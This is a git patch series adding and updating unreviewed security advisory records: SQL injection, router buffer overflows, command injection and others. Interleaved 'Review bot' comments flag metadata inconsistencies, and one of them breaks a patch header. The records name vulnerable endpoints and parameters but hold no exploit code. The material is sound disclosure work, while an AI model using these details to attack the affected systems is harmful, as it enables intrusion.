index 0000000000000..60ca50ad37bc5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wf2x-4p8v-p7m6/GHSA-wf2x-4p8v-p7m6.json 
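Review bot: GHSA-w7wm-w9qw-pc72 names `Web Ofisi Emlak V2` in `details` but its vendor reference points to `emlak-scripti-v3.html`, whereas GHSA-wf2x-4p8v-p7m6 for Emlak v2 links `emlak-scripti-v2.html`. With `"affected": []` empty, the product version rests on these two fields, and they disagree. Either the product name or the vendor URL should be corrected after checking CVE-2019-25459 upstream.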
@@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wf2x-4p8v-p7m6", + "modified": "2026-02-22T15:30:15Z", + "published": "2026-02-22T15:30:15Z", + "aliases": [ + "CVE-2019-25456" + ], + "details": "Web Ofisi Emlak v2 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the 'ara' GET parameter. Attackers can send requests to with time-based SQL injection payloads to extract sensitive database information or cause denial of service.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25456" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47141" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/web-ofisi-emlak-sql-injection-via-ara-parameter" + }, + { + "type": "WEB", + "url": "https://www.web-ofisi.com/detay/emlak-scripti-v2.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T15:16:15Z" + } +} \ No newline at end of file From 90d3ff730bc5ef9bfc78141f33d0d03927b022bb Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sun, 22 Feb 2026 18:32:13 +0000 Subject: [PATCH 46/77] Publish Advisories GHSA-rwj4-mf8r-c2pg GHSA-wfh6-52w8-8gcj --- .../2025/10/GHSA-rwj4-mf8r-c2pg/GHSA-rwj4-mf8r-c2pg.json | 1 + .../2026/01/GHSA-wfh6-52w8-8gcj/GHSA-wfh6-52w8-8gcj.json | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) 
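Review bot: The `details` text of GHSA-wf2x-4p8v-p7m6 ends with `or cause denial of service`, but both severity vectors in the record rate availability impact as none (`A:N` and `VA:N`). Anyone prioritising on the vector will not see the availability risk the prose claims. Either the clause should be dropped or the vectors raised, depending on what the CVE-2019-25456 source supports.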
diff --git a/advisories/unreviewed/2025/10/GHSA-rwj4-mf8r-c2pg/GHSA-rwj4-mf8r-c2pg.json b/advisories/unreviewed/2025/10/GHSA-rwj4-mf8r-c2pg/GHSA-rwj4-mf8r-c2pg.json index 6853e440211dc..dbebe3b873d59 100644 --- a/advisories/unreviewed/2025/10/GHSA-rwj4-mf8r-c2pg/GHSA-rwj4-mf8r-c2pg.json +++ b/advisories/unreviewed/2025/10/GHSA-rwj4-mf8r-c2pg/GHSA-rwj4-mf8r-c2pg.json @@ -26,6 +26,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-1310", "CWE-288" ], "severity": "MODERATE", diff --git a/advisories/unreviewed/2026/01/GHSA-wfh6-52w8-8gcj/GHSA-wfh6-52w8-8gcj.json b/advisories/unreviewed/2026/01/GHSA-wfh6-52w8-8gcj/GHSA-wfh6-52w8-8gcj.json index c5f8ffd95c929..5b4bb0c4728ad 100644 --- a/advisories/unreviewed/2026/01/GHSA-wfh6-52w8-8gcj/GHSA-wfh6-52w8-8gcj.json +++ b/advisories/unreviewed/2026/01/GHSA-wfh6-52w8-8gcj/GHSA-wfh6-52w8-8gcj.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-wfh6-52w8-8gcj", - "modified": "2026-01-17T00:30:24Z", + "modified": "2026-02-22T18:31:00Z", "published": "2026-01-17T00:30:24Z", "aliases": [ "CVE-2026-21223" From 241db5feded02f0688f0292bc73e9705a063a74c Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sun, 22 Feb 2026 21:33:10 +0000 Subject: [PATCH 47/77] Publish Advisories GHSA-5rm3-93cg-6rcr GHSA-c99q-x737-hc5j --- .../2026/02/GHSA-5rm3-93cg-6rcr/GHSA-5rm3-93cg-6rcr.json | 6 +++++- .../2026/02/GHSA-c99q-x737-hc5j/GHSA-c99q-x737-hc5j.json | 6 +++++- 2 files changed, 10 insertions(+), 2 deletions(-) diff --git a/advisories/unreviewed/2026/02/GHSA-5rm3-93cg-6rcr/GHSA-5rm3-93cg-6rcr.json b/advisories/unreviewed/2026/02/GHSA-5rm3-93cg-6rcr/GHSA-5rm3-93cg-6rcr.json index 0b8e34069dad2..7a68ca5826b2e 100644 --- a/advisories/unreviewed/2026/02/GHSA-5rm3-93cg-6rcr/GHSA-5rm3-93cg-6rcr.json +++ b/advisories/unreviewed/2026/02/GHSA-5rm3-93cg-6rcr/GHSA-5rm3-93cg-6rcr.json 
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-5rm3-93cg-6rcr",
- "modified": "2026-02-16T18:31:28Z",
+ "modified": "2026-02-22T21:31:25Z",
 "published": "2026-02-16T18:31:28Z",
 "aliases": [
 "CVE-2026-26930"
@@ -26,6 +26,10 @@
 {
 "type": "WEB",
 "url": "https://www.smartertools.com/smartermail/release-notes/current"
+ },
+ {
+ "type": "WEB",
+ "url": "http://seclists.org/fulldisclosure/2026/Feb/30"
 }
 ],
 "database_specific": {
diff --git a/advisories/unreviewed/2026/02/GHSA-c99q-x737-hc5j/GHSA-c99q-x737-hc5j.json b/advisories/unreviewed/2026/02/GHSA-c99q-x737-hc5j/GHSA-c99q-x737-hc5j.json
index bf2ba359be027..cdf08baa7182a 100644
--- a/advisories/unreviewed/2026/02/GHSA-c99q-x737-hc5j/GHSA-c99q-x737-hc5j.json
+++ b/advisories/unreviewed/2026/02/GHSA-c99q-x737-hc5j/GHSA-c99q-x737-hc5j.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-c99q-x737-hc5j",
- "modified": "2026-02-17T15:31:35Z",
+ "modified": "2026-02-22T21:31:25Z",
 "published": "2026-02-16T15:32:47Z",
 "aliases": [
 "CVE-2026-2447"
@@ -23,6 +23,10 @@
 "type": "WEB",
 "url": "https://bugzilla.mozilla.org/show_bug.cgi?id=2014390"
 },
+ {
+ "type": "WEB",
+ "url": "https://lists.debian.org/debian-lts-announce/2026/02/msg00028.html"
+ },
 {
 "type": "WEB",
 "url": "https://www.mozilla.org/security/advisories/mfsa2026-10"
From 03f1c80ea1e5b3fd636dd7b70543bc7e43c5c68d Mon Sep 17 00:00:00 2001
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com>
Date: Mon, 23 Feb 2026 00:32:04 +0000
Subject: [PATCH 48/77] Publish Advisories GHSA-36h6-rv4g-3jg5 GHSA-3w68-qp5h-x838 GHSA-58v6-hqx7-g3f3 GHSA-8gq5-mm3m-7h4x GHSA-8q98-3cmj-g687
---
 .../GHSA-36h6-rv4g-3jg5.json | 56 +++++++++++++++++++
 .../GHSA-3w68-qp5h-x838.json | 56 +++++++++++++++++++
 .../GHSA-58v6-hqx7-g3f3.json | 52 +++++++++++++++++
 .../GHSA-8gq5-mm3m-7h4x.json | 39 +++++++++++++
 .../GHSA-8q98-3cmj-g687.json | 52 +++++++++++++++++
 5 files changed, 255 insertions(+)
 create mode 100644 advisories/unreviewed/2026/02/GHSA-36h6-rv4g-3jg5/GHSA-36h6-rv4g-3jg5.json
 create mode 100644 advisories/unreviewed/2026/02/GHSA-3w68-qp5h-x838/GHSA-3w68-qp5h-x838.json
 create mode 100644 advisories/unreviewed/2026/02/GHSA-58v6-hqx7-g3f3/GHSA-58v6-hqx7-g3f3.json
 create mode 100644 advisories/unreviewed/2026/02/GHSA-8gq5-mm3m-7h4x/GHSA-8gq5-mm3m-7h4x.json
 create mode 100644 advisories/unreviewed/2026/02/GHSA-8q98-3cmj-g687/GHSA-8q98-3cmj-g687.json
diff --git a/advisories/unreviewed/2026/02/GHSA-36h6-rv4g-3jg5/GHSA-36h6-rv4g-3jg5.json b/advisories/unreviewed/2026/02/GHSA-36h6-rv4g-3jg5/GHSA-36h6-rv4g-3jg5.json
new file mode 100644
index 0000000000000..5b1f08301fd93
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-36h6-rv4g-3jg5/GHSA-36h6-rv4g-3jg5.json
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-36h6-rv4g-3jg5",
+ "modified": "2026-02-23T00:30:26Z",
+ "published": "2026-02-23T00:30:26Z",
+ "aliases": [
+ "CVE-2026-2958"
+ ],
+ "details": "A security vulnerability has been detected in D-Link DWR-M960 1.01.07. Affected is the function sub_457C5C of the file /boafrm/formWsc. Such manipulation of the argument save_apply leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed publicly and may be used.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2958"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/LX-66-LX/cve-new/issues/25"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347325"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347325"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.754509"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.dlink.com"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-119"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T00:16:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-3w68-qp5h-x838/GHSA-3w68-qp5h-x838.json b/advisories/unreviewed/2026/02/GHSA-3w68-qp5h-x838/GHSA-3w68-qp5h-x838.json
new file mode 100644
index 0000000000000..a2c1a30cec8df
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-3w68-qp5h-x838/GHSA-3w68-qp5h-x838.json
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3w68-qp5h-x838",
+ "modified": "2026-02-23T00:30:26Z",
+ "published": "2026-02-23T00:30:26Z",
+ "aliases": [
+ "CVE-2026-2959"
+ ],
+ "details": "A vulnerability was detected in D-Link DWR-M960 1.01.07. Affected by this vulnerability is the function sub_44E0F8 of the file /boafrm/formNewSchedule. Performing a manipulation of the argument url results in stack-based buffer overflow. Remote exploitation of the attack is possible. The exploit is now public and may be used.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2959"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/LX-66-LX/cve-new/issues/26"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347326"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347326"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.754511"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.dlink.com"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-119"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T00:16:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-58v6-hqx7-g3f3/GHSA-58v6-hqx7-g3f3.json b/advisories/unreviewed/2026/02/GHSA-58v6-hqx7-g3f3/GHSA-58v6-hqx7-g3f3.json
new file mode 100644
index 0000000000000..3c15584aa2a98
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-58v6-hqx7-g3f3/GHSA-58v6-hqx7-g3f3.json
@@ -0,0 +1,52 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-58v6-hqx7-g3f3",
+ "modified": "2026-02-23T00:30:26Z",
+ "published": "2026-02-23T00:30:26Z",
+ "aliases": [
+ "CVE-2026-2957"
+ ],
+ "details": "A weakness has been identified in qinming99 dst-admin up to 1.5.0. This impacts the function deleteBackup of the file src/main/java/com/tugos/dst/admin/controller/BackupController.java of the component File Handler. This manipulation causes denial of service. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2957"
+ },
+ {
+ "type": "WEB",
+ "url": "https://fx4tqqfvdw4.feishu.cn/docx/YKwydLrdno51JtxJksmcWSfbnvd?from=from_copylink"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347324"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347324"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.754510"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-404"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-22T23:15:59Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-8gq5-mm3m-7h4x/GHSA-8gq5-mm3m-7h4x.json b/advisories/unreviewed/2026/02/GHSA-8gq5-mm3m-7h4x/GHSA-8gq5-mm3m-7h4x.json
new file mode 100644
index 0000000000000..75d8610497366
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-8gq5-mm3m-7h4x/GHSA-8gq5-mm3m-7h4x.json
@@ -0,0 +1,39 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-8gq5-mm3m-7h4x",
+ "modified": "2026-02-23T00:30:26Z",
+ "published": "2026-02-23T00:30:26Z",
+ "aliases": [
+ "CVE-2026-2588"
+ ],
+ "details": "Crypt::NaCl::Sodium versions through 2.001 for Perl has an integer overflow flaw on 32-bit systems.\n\nSodium.xs casts a STRLEN (size_t) to unsigned long long when passing a length pointer to libsodium functions. On 32-bit systems size_t is typically 32-bits while an unsigned long long is at least 64-bits.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2588"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/cpan-authors/crypt-nacl-sodium/commit/557388bdb4da416a56663cda0154b80cd524395c.patch"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/cpan-authors/crypt-nacl-sodium/commit/8cf7f66ba922443e131c9deae1ee00fafe4f62e4.patch"
+ },
+ {
+ "type": "WEB",
+ "url": "https://metacpan.org/release/TIMLEGGE/Crypt-NaCl-Sodium-2.001/source/Sodium.xs#L2119"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-190"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T00:15:59Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-8q98-3cmj-g687/GHSA-8q98-3cmj-g687.json b/advisories/unreviewed/2026/02/GHSA-8q98-3cmj-g687/GHSA-8q98-3cmj-g687.json
new file mode 100644
index 0000000000000..9b05e0928a0a1
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-8q98-3cmj-g687/GHSA-8q98-3cmj-g687.json
@@ -0,0 +1,52 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-8q98-3cmj-g687",
+ "modified": "2026-02-23T00:30:26Z",
+ "published": "2026-02-23T00:30:26Z",
+ "aliases": [
+ "CVE-2026-2956"
+ ],
+ "details": "A security flaw has been discovered in qinming99 dst-admin up to 1.5.0. This affects the function revertBackup of the file /home/restore. The manipulation of the argument Name results in command injection. The attack can be launched remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2956"
+ },
+ {
+ "type": "WEB",
+ "url": "https://fx4tqqfvdw4.feishu.cn/docx/ObYgdtoweowo8Vx4dmuckqC7nBe?from=from_copylink"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347323"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347323"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.754508"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-74"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-22T22:15:59Z"
+ }
+}
\ No newline at end of file
From ace7bffa840a4fa08e3fe04f7da545b28c63389e Mon Sep 17 00:00:00 2001
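Review bot: `cwe_ids` in GHSA-8q98-3cmj-g687 carries only the generic parent `"CWE-74"`, although `details` names the weakness as command injection through the Name argument of revertBackup; adding the specific `"CWE-77"` would let consumers filter and prioritise on it. The same generic mapping appears in GHSA-m69x-r9q9-whf9 later in this series, where `details` describes SQL injection and `"CWE-89"` would be the specific id. If the upstream record supplies only CWE-74, keeping it and listing the specific id next to it preserves the source mapping.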
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com>
Date: Mon, 23 Feb 2026 03:32:04 +0000
Subject: [PATCH 49/77] Publish Advisories GHSA-5rv4-3jvj-f68v GHSA-6m36-rgr7-cxwp GHSA-72rq-263w-2jx8 GHSA-9rv8-797j-7r85 GHSA-m5mm-h952-fxjj GHSA-m69x-r9q9-whf9 GHSA-p2r3-72mr-vwg2 GHSA-w6qc-qw25-92c3 GHSA-xcgv-f626-23hx
---
 .../GHSA-5rv4-3jvj-f68v.json | 56 +++++++++++++++++++
 .../GHSA-6m36-rgr7-cxwp.json | 56 +++++++++++++++++++
 .../GHSA-72rq-263w-2jx8.json | 48 ++++++++++++++++
 .../GHSA-9rv8-797j-7r85.json | 36 ++++++++++++
 .../GHSA-m5mm-h952-fxjj.json | 54 ++++++++++++++++++
 .../GHSA-m69x-r9q9-whf9.json | 52 +++++++++++++++++
 .../GHSA-p2r3-72mr-vwg2.json | 56 +++++++++++++++++++
 .../GHSA-w6qc-qw25-92c3.json | 44 +++++++++++++++
 .../GHSA-xcgv-f626-23hx.json | 52 +++++++++++++++++
 9 files changed, 454 insertions(+)
 create mode 100644 advisories/unreviewed/2026/02/GHSA-5rv4-3jvj-f68v/GHSA-5rv4-3jvj-f68v.json
 create mode 100644 advisories/unreviewed/2026/02/GHSA-6m36-rgr7-cxwp/GHSA-6m36-rgr7-cxwp.json
 create mode 100644 advisories/unreviewed/2026/02/GHSA-72rq-263w-2jx8/GHSA-72rq-263w-2jx8.json
 create mode 100644 advisories/unreviewed/2026/02/GHSA-9rv8-797j-7r85/GHSA-9rv8-797j-7r85.json
 create mode 100644 advisories/unreviewed/2026/02/GHSA-m5mm-h952-fxjj/GHSA-m5mm-h952-fxjj.json
 create mode 100644 advisories/unreviewed/2026/02/GHSA-m69x-r9q9-whf9/GHSA-m69x-r9q9-whf9.json
 create mode 100644 advisories/unreviewed/2026/02/GHSA-p2r3-72mr-vwg2/GHSA-p2r3-72mr-vwg2.json
 create mode 100644 advisories/unreviewed/2026/02/GHSA-w6qc-qw25-92c3/GHSA-w6qc-qw25-92c3.json
 create mode 100644 advisories/unreviewed/2026/02/GHSA-xcgv-f626-23hx/GHSA-xcgv-f626-23hx.json
diff --git a/advisories/unreviewed/2026/02/GHSA-5rv4-3jvj-f68v/GHSA-5rv4-3jvj-f68v.json b/advisories/unreviewed/2026/02/GHSA-5rv4-3jvj-f68v/GHSA-5rv4-3jvj-f68v.json
new file mode 100644
index 0000000000000..571749c693e05
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-5rv4-3jvj-f68v/GHSA-5rv4-3jvj-f68v.json
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5rv4-3jvj-f68v",
+ "modified": "2026-02-23T03:30:21Z",
+ "published": "2026-02-23T03:30:21Z",
+ "aliases": [
+ "CVE-2026-2960"
+ ],
+ "details": "A flaw has been found in D-Link DWR-M960 1.01.07. Affected by this issue is the function sub_468D64 of the file /boafrm/formDhcpv6s. Executing a manipulation of the argument submit-url can lead to stack-based buffer overflow. The attack can be executed remotely. The exploit has been published and may be used.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2960"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/LX-66-LX/cve-new/issues/27"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347327"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347327"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.754512"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.dlink.com"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-119"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T01:16:17Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-6m36-rgr7-cxwp/GHSA-6m36-rgr7-cxwp.json b/advisories/unreviewed/2026/02/GHSA-6m36-rgr7-cxwp/GHSA-6m36-rgr7-cxwp.json
new file mode 100644
index 0000000000000..c342df6f96464
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-6m36-rgr7-cxwp/GHSA-6m36-rgr7-cxwp.json
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-6m36-rgr7-cxwp",
+ "modified": "2026-02-23T03:30:22Z",
+ "published": "2026-02-23T03:30:21Z",
+ "aliases": [
+ "CVE-2026-2961"
+ ],
+ "details": "A vulnerability has been found in D-Link DWR-M960 1.01.07. This affects the function sub_4196C4 of the file /boafrm/formVpnConfigSetup of the component VPN Configuration Endpoint. The manipulation of the argument submit-url leads to stack-based buffer overflow. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2961"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/LX-66-LX/cve-new/issues/28"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347328"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347328"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.754513"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.dlink.com"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-119"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T01:16:17Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-72rq-263w-2jx8/GHSA-72rq-263w-2jx8.json b/advisories/unreviewed/2026/02/GHSA-72rq-263w-2jx8/GHSA-72rq-263w-2jx8.json
new file mode 100644
index 0000000000000..47162f464e146
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-72rq-263w-2jx8/GHSA-72rq-263w-2jx8.json
@@ -0,0 +1,48 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-72rq-263w-2jx8",
+ "modified": "2026-02-23T03:30:22Z",
+ "published": "2026-02-23T03:30:22Z",
+ "aliases": [
+ "CVE-2026-2964"
+ ],
+ "details": "A vulnerability was identified in higuma web-audio-recorder-js 0.1/0.1.1. Impacted is the function extend in the library lib/WebAudioRecorder.js of the component Dynamic Config Handling. Such manipulation leads to improperly controlled modification of object prototype attributes. It is possible to launch the attack remotely. Attacks of this nature are highly complex. The exploitability is considered difficult. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2964"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347331"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347331"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.755221"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-94"
+ ],
+ "severity": "LOW",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T02:16:39Z"
+ }
+}
\ No newline at end of file
